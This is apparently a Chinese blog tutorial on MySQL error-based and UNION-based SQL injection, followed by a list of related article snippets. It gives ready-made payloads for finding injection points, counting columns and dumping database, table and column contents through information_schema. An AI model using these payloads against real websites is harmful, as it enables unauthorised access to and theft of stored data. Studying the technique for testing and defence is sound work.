mysql显错注入,SQL注入:显错注入
SQL注入的本质
就是把用户输入的数据当做代码执行
注入条件
1.用户能控制输入
2.能够将程序原本执行的代码,拼接上用户输入的数据进行执行
例:
http://www.xxx.com/new.php?id=1
http://www.xxx.com/new.php?id=2-1
注入的基本流程
1.判断是否存在注入点
1.最古老的方法:
? and 1=1 页面正常
? and 1=2 页面不正常
? 注:and 1=1 and 1=2 被拦截的可能性太高了
? 可以尝试 and -1=-1 and -1=-2或者直接 or sleep(5)
2.最简单的方法:
? 页面后面加‘,看是否报错
3.常用的方法:
? 如果是数字型传参,可以尝试-1
2.猜解字段数
order by 字段数 //显示报错则字段数为前面一个值
3.联合查询找出注入点
and 1=2 union select 1,2,3,…… //可以将字段都写上去
4.爆库、表、字段
查用户权限:union select 1,user(),3
查库:union select 1,database(),3
查表:union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =‘库名‘),3
查字段:union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘库名‘ and table_name = ‘表名‘),3
5.查询我们需要的数据
查数据:union select 1,(select group_concat(字段1,字段2) from 库名.表名),3
注入常用函数:
group_concat(字段1,字段2) //返回由属于一组的列值连接组合而成的结果
ASCII(char) //返回字符的ASCII码值
DATABASE() //返回当前数据库名
USER()或SYSTEM_USER() //返回当前登陆用户名
VERSION() //返回MySQL服务器的版本
SLEEP(n) //休眠n秒
原文:https://www.cnblogs.com/yanlzy/p/11884291.html
mysql显错注入,SQL注入:显错注入相关推荐
- Mysql导入zabbix的sql语句时报错:ERROR 1045 (28000)
#Warning: Using a password on the command line interface can be insecure. #ERROR 1045 (28000): Acces ...
- mysql 用source导入sql脚本报错ASCII appeared in the statement, but this is not allowed unless op
解决方式: 用cmd打开而不是powershell 用记事本打开sql脚本,另存为,同时把编码方式改为UTF-8即可
- SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...
- 基于GET报错的sql注入,sqli-lab 1~4
根据注入类型可将sql注入分为两类:数字型和字符型 例如: 数字型: sleect * from table where if =用户输入id 字符型:select * from table wher ...
- 报错型sql注入原理分析
0x00:前言 关于sql注入,经久不衰,现在的网站一般对sql注入的防护也相对加强了,2016年的***测试报告中,出现最多的是xss(跨站脚本***)和明文传输等,但是对sql注入的利用方式,也相 ...
- SQL注入攻击(SQL注入(SQLi)攻击)-报错注入
页面没有显示位 , 但有数据库的报错信息时 , 可使用报错注入 报错注入是最常用的注入方式 , 也是使用起来最方便(我觉得)的一种注入方式 updatexml(1,'~',3); 第二个参数包含特殊字 ...
- sql注入 1-1_基于报错的注入
sql注入 1-1_ 基于报错注入 1.判断是否存在报错注入 通过 id =1 可以看到服务器返回正常页面 通过 id=1 and 1=1 通过 id=1 and 1=2 服务器也返回正常 通过 id ...
- mysql注入原理_Mysql报错注入原理分析
报错类型Duplicate entry报错:多次查询插入重复键值导致count报错从而在报错信息中带入了敏感信息. Xpath报错:从mysql5.1.5开始提供两个XML查询和修改的函数,语法错误导 ...
- 帆软报表,报错:sql注入攻击问题
帆软报表,报错:sql注入攻击问题: 解决办法:去数据决策系统-安全管理-SQL注入-关掉禁用特殊关键字选项,如下图所示
- SQL注入之floor报错注入
SQL注入之floor报错注入 原理 一.count()函数.group by 二.floor()函数 三.rand()函数 四.报错初体验 五.报错注入 1.获取当前数据库 2.获取当前用户 六.靶 ...
最新文章
- 手机直播系统源码搭建说明
- boost::process::shell相关的测试程序
- 关于bootstrap的treeview不显示多选(复选框)的问题,以及联动选择的问题,外加多选后取值...
- H2Database 转义符
- java中级做dao模型_DAO-持久层-领域对象-贫血模型
- python博客下载本地文件_解决django无法访问本地static文件(js,css,img)网页里js,cs都加载不了...
- 零式机器人_最帅机器人作品“EVA”“天元突破”谁才是男人真正的浪漫
- Jeewx-api 1.1 版本发布,微信极速 SDK
- 电脑重启f12怎么处理_电脑开机按f12怎么恢复系统(详解f12的使用方法)
- jq onclick 定义_jq中的onclick绑定事件
- python关键字详解_Python 关键字
- 如果判断小米MIUI的NFC权限、后台弹出界面权限是否禁用
- 上海波涛装饰集团有限公司乐山分公司
- Testudo:Spartan + Groth16 的R1CS ZKP证明系统
- QRCode生成二维码和解析二维码
- python中import文件夹下面py文件,报错
- 施一公:无论什么学科,研究生最不重要的素质就是智商
- 期权组合策略用matlab分析,matlab期权分析
- php.ini中文翻译-转载
- 【SDK】01 支付宝当面付 - 沙箱环境
热门文章
- vscode 经过跳板机,连接到内网服务器
- 【PAT甲级 stack queue的使用】1051 Pop Sequence (25 分) C++ 全部AC
- 【Java注解】自定义注解、与数据库结合使用
- 密码学系列之:加密货币中的scrypt算法
- SSO的通用标准OpenID Connect
- sharding-jdbc整合mybatis
- 50个常用元器件图片_盘点2020年wordpress常用的50个插件合集
- kotlin学习之类(三)
- PAT甲级 -- 1041 Be Unique (20 分)
- 组合和聚合的区别,通俗易懂。